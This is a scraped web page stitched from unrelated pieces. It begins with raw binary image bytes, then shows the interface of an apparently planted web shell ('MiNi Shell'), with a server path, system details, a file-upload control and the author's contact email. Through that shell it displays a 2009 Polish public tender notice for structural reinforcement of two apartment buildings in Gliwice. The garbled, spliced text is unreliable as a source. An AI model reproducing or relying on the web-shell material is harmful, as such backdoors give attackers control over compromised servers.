JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090807/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090807/129915-N-2009.html

<p class="kh_header"><b>Gliwice: wykonanie zabezpieczenia (palowanie, ankrowanie) budynków mieszkalnych
przy ul. Stalmacha 2 i ul. Stalmacha 4 w Gliwicach wraz z opracowaniem dokumentacji projektowo- kosztorysowej, poprzedzonej wierceniami geologicznymi i badaniami laboratoryjnymi</b><br>
<b>Numer ogłoszenia: 129915 - 2009; data zamieszczenia: 07.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Budynków Miejskich I Towarzystwo Budownictwa Społecznego Sp. z o.o , ul. Dolnych Wałów 11, 44-100 Gliwice, woj. śląskie, tel. 032 3392900, faks 032 3392962.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zbm.gliwice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie zabezpieczenia (palowanie, ankrowanie) budynków mieszkalnych
przy ul. Stalmacha 2 i ul. Stalmacha 4 w Gliwicach wraz z opracowaniem dokumentacji projektowo- kosztorysowej, poprzedzonej wierceniami geologicznymi i badaniami laboratoryjnymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie zabezpieczenia (palowanie, ankrowanie) budynków mieszkalnych  przy ul. Stalmacha 2 i ul. Stalmacha 4 w Gliwicach wraz z opracowaniem dokumentacji projektowo- kosztorysowej, poprzedzonej wierceniami geologicznymi i badaniami laboratoryjnymi, w oparciu o wytyczne zawarte w Opisie zamówienia, który stanowi Załącznik nr 1 do SIWZ .
2.Wykonawca ma obowiązek dokonać oględzin budynku w naturze.
3.Inwestycja wykonywana będzie w całości z materiałów dostarczanych przez wykonawcę:
a)	do realizacji zamówienia należy zastosować materiały i wyroby dopuszczone do stosowania, posiadające certyfikat na znak bezpieczeństwa, deklarację zgodności z Polską Normą lub aprobatą techniczną oraz w I gatunku,
b)	zastosowane przez wykonawcę środki i materiały budowlane nie mogą mieć parametrów technicznych i jakościowych gorszych, niż zastosowane w projekcie.
c)	jeżeli Wykonawca przewiduje inne materiały niż zakłada projekt, należy je wskazać i opisać oraz udokumentować, że posiadają nie gorsze parametry techniczne i jakościowe.
4.Zakres zamówienia na roboty budowlane obejmuje: 
a)	prace przygotowawcze - przygotowanie placu budowy, zgodnie z przepisami                BHP i Prawa budowlanego,
b)	roboty budowlane zgodnie z  dokumentacją techniczną, pozwoleniem, oraz przepisami Prawa budowlanego,
c)	prace dodatkowe, wraz z kosztami ich wykonania (jeśli dotyczy): 
-dostawa energii elektrycznej, wody i gazu do celów technologicznych i socjalnych,
-wykonanie dokumentacji powykonawczej,
-wywóz i składowanie humusu i ziemi,
-uzyskanie wszystkich dodatkowych uzgodnień związanych z realizacją zadania łącznie z dodatkowymi uzgodnieniami mogącymi wyniknąć ze zmianą obowiązującego prawa podczas realizacji.
Kosztów dodatkowych (a -prace przygotowawcze oraz c -prace dodatkowe) nie należy wyceniać osobno. Koszty te powinny zostać ujęte w ogólnym bilansie.
5.Wykonawca, który wygra przetarg, zobowiązany będzie do uzgodnienia harmonogramu realizacji zamówienia z osobą odpowiedzialną za realizację umowy po stronie Zamawiającego w terminie do 5 dni roboczych od daty jej podpisania. Wzór harmonogramu rzeczowo- finansowego stanowi Załącznik nr 2 do SIWZ.
6.Informacje dodatkowe:
a)	rozliczenie usług projektowych oraz prac geodezyjno-laboratoryjnych nastąpi w formie ryczałtu,
b)	rozliczenie robót budowlanych wykonanych na podstawie dokumentacji sporządzonej w ramach niniejszego zamówienia nastąpi w formie ryczałtu, zgodnie z ofertą.
c)	w uzasadnionych przypadkach Zamawiający zastrzega sobie prawo rezygnacji z części robót. Roboty nie wykonane, nie podlegają fakturowaniu w ramach niniejszego kontraktu.
d)	uzyskanie wszelkich pozwoleń oraz wynikających z tego tytułu opłat, związanych z realizacją przedmiotowej inwestycji (np. zajęcie pasa drogowego, chodnika itp.) leży w gestii Wykonawcy którego to dotyczy, po uprzednim uzyskaniu Pełnomocnictwa od Zamawiającego.
e)	w przypadku konieczności wykonania robót dodatkowych, Zamawiający zastosuje właściwy tryb udzielenia zamówienia w oparciu o przepisy ustawy Prawo Zamówień Publicznych. W tym przypadku Zamawiający zastrzega sobie prawo wprowadzenia na teren budowy innego Wykonawcy.
f)	zamawiający nie wyraża zgodny na instalowanie w obrębie realizacji inwestycji (cały teren działki, której dotyczy inwestycja) reklam bez jego zgody. Warunki uzyskania zgody j.w. mogą być przedmiotem oddzielnych negocjacji..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.12.10.00-1, 45.11.12.50-5, 45.11.12.30-9, 45.21.90.00-9, 45.22.32.00-8, 71.35.10.00-3, 71.22.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Oferta musi być zabezpieczona wadium w wysokości: 11 000,00 PLN.
2.Wadium należy wnieść  w terminie do dnia 28.08.2009r., do godz. 09:00.
3.Wadium może być wnoszone w jednej lub kilku następujących formach:
a)	pieniądzu:
przelewem na rachunek bankowy Zamawiającego: ING Bank Śląski S.A. Oddział w Gliwicach 20 1050 1285 1000 0022 2649 4546.
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4.Zamawiający zwraca niezwłocznie wadium jeżeli:
a)	upłynął termin związania ofertą;
b)	zawarto umowę w sprawie zamówienia publicznego i wniesiono zabezpieczenie należytego wykonania tej umowy;
c)	Zamawiający unieważnił postępowanie o udzielenie zamówienia, a protesty zostały ostatecznie rozstrzygnięte lub upłynął termin do ich wnoszenia;
d)	wpłynął wniosek Wykonawcy, z zastrzeżeniem pkt.5:
-który wycofał ofertę przed upływem terminu składania ofert;
-który został wykluczony z postępowania;
-którego oferta została odrzucona.
5.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo Zamówień Publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust.1 ustawy Prawo Zamówień Publicznych, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
6.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.W postępowaniu mogą wziąć udział Wykonawcy nie podlegający wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 roku Prawo Zamówień Publicznych (Dz. U. z 2006 r. Nr 164, poz. 1163 z późn. zm.) i spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
2.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia na zasadach określonych w art. 23 ustawy Prawo Zamówień Publicznych. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców.
3.Wykonawcy biorący udział w postępowaniu muszą spełnić następujące warunki:
a)	posiadać uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlegać wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych,
b)	posiadać niezbędną wiedzę i doświadczenie oraz dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
c)	znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.Nie spełnienie któregokolwiek ze wskazanych wyżej warunków i wymogów skutkować będzie wykluczeniem Wykonawcy z udziału w postępowaniu.
5.Ocena spełniania warunków odbędzie się według schematu spełnia-nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Formularz ofertowy  -  według załączonego druku. Cenę ofertową należy podać  w jednostkach pieniężnych obowiązujących           w Polsce tj. złotych polskich, z zaokrągleniem do drugiego miejsca po przecinku.
2.Aktualny odpis z właściwego Rejestru Sądowego lub zaświadczenie o wpisie do Ewidencji Działalności Gospodarczej, potwierdzające prowadzenie działalności o profilu pozwalającym zrealizować zamówienie, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (oryginał lub kserokopia). Zamawiający dopuszcza dokument wystawiony z wcześniejszą datą, pod warunkiem, że zostanie on poświadczony przez organ wydający za zgodność z oryginałem  i będzie miał jego adnotację o aktualności danych na dzień poświadczenia (data poświadczenia - jak wyżej).W przypadku aktualizacji danych w okresie przypadającym na uczestnictwo w postępowaniu (np. powołanie oddziału, poszerzenie branży), Wykonawca zobowiązany jest dodatkowo do przedłożenia kserokopii wniosku o aktualizację bądź pisemnego wyjaśnienia, sporządzonego zgodnie z warunkami niniejszego postępowania. W przypadku spółek cywilnych należy dołączyć umowę spółki.
3.Oświadczenie, że Wykonawca spełnia warunki określone w Art. 22.1 i 24 Ustawy Prawo Zamówień Publicznych. Druk oświadczenia stanowi załącznik do SIWZ.
4.Oświadczenie Wykonawcy, iż spełnia wszystkie warunki przetargu. Druk oświadczenia stanowi załącznik do SIWZ.
5.Wykazy zrealizowanych zamówień w ciągu ostatnich 3 lat (usługi) i 5 lat (roboty budowlane) zbliżonych co do rodzaju, zakresu i wartości robót objętych niniejszym zamówieniem. 
Wykonawca musi udowodnić zrealizowanie jako główny wykonawca:
a)
w okresie ostatnich 3 lat  co najmniej dwóch oddzielnych zamówień dotyczących wykonania dokumentacji projektowo - kosztorysowych remontu/budowy budynków mieszkalnych lub mieszkalno-usługowych, 
b)
w okresie ostatnich 5 lat co najmniej trzech oddzielnych zamówień dotyczących robót konstrukcyjnych (wymiana stropu, ankrowanie, etc,); oraz co najmniej dwóch oddzielnych zamówień dotyczących prac ziemnych związanych ze wzmocnieniem terenu w technologii palowania.  
Jeśli treść referencji bądź innego dokumentu nie potwierdza wymaganego zakresu, należy w wykazie zamieścić odpowiedni (uzupełniający) opis.
UWAGA: 
Zamawiający dopuszcza wykazania w ofercie zamówień zrealizowanych przez Wykonawcę, który był kompleksowym podwykonawcą robót budowlanych. Dokumentem potwierdzającym należyte wykonanie robót przez takiego Wykonawcę może być wyłącznie dokument wystawiony przez Inwestora (a nie głównego Wykonawcę, który podzlecił roboty). 
Zamawiający dopuszcza również wykazania w ofercie zamówień zrealizowanych przez Podwykonawcę/ów prac projektowych (wskazanych jedynie w Informacji o podwykonawcach).
6.Dokumenty potwierdzające, że roboty wpisane do wykazu zrealizowanych zamówień zostały wykonane  z należytą starannością.
7.Uprawnienia zawodowe (zgodnie z wypełnionym drukiem Wykaz osób i podmiotów wykonujących zamówienie).Uprawnienia zawodowe (załączyć kserokopie), w tym uprawniające do pełnienia funkcji kierownika budowy lub odpowiednio  kierownika robót (5 letni staż w pełnieniu funkcji kierownika budowy, posiadającego uprawnienia budowlane w specjalności konstrukcyjno-budowlanej pozwalającej nadzorować prace objęte niniejszym zamówieniem). Należy dołączyć aktualne zaświadczenie o wpisie na listę członków właściwej izby samorządu zawodowego, potwierdzające prawo do wykonywania samodzielnych funkcji technicznych w budownictwie (Ustawa z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - Dz. U.  z 2001r.,  Nr 5, poz. 42 z późn. zmianami).
8.Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub KRUS potwierdzających odpowiednio, że Wykonawca nie zalega  z opłacaniem podatków, opłat oraz składek  na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonywania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
9.Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na  sumę ubezpieczenia nie mniejszą niż 200 000zł. Do polisy należy dołączyć dowód opłacenia składki (bądź jej treść winna wskazywać na jej opłacenie) - Zamawiający musi stwierdzić ważność dokumentu.
10.Dowód wpłaty wadium, zamieszczony zgodnie z pkt. 9 SIWZ. 
11.Zaparafowany wzór umowy (wszystkie strony) - dołączony do SIWZ.
12.Informacja o podwykonawcach.Do wypełnienia druk, stanowiący załącznik do  SIWZ (załączany w przypadku wskazania usług/robót wykonywanych przez podwykonawców; brak druku w ofercie wskazuje na realizację zamówienia bez udziału podwykonawców)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Gwarancja na roboty budowlane - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://przetargi.zbm.gliwice.pl/s26.zip.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Budynków Miejskich I TBS Sp. z o.o.
Sekcja Zamówień Publicznych
ul. Zwycięstwa 13, IIIp., pok.324
44-100 Gliwice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.08.2009 godzina 09:00, miejsce: Zarząd Budynków Miejskich I TBS Sp. z o.o.
Sekcja Zamówień Publicznych
ul. Zwycięstwa 13, IIIp., pok.324
44-100 Gliwice.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com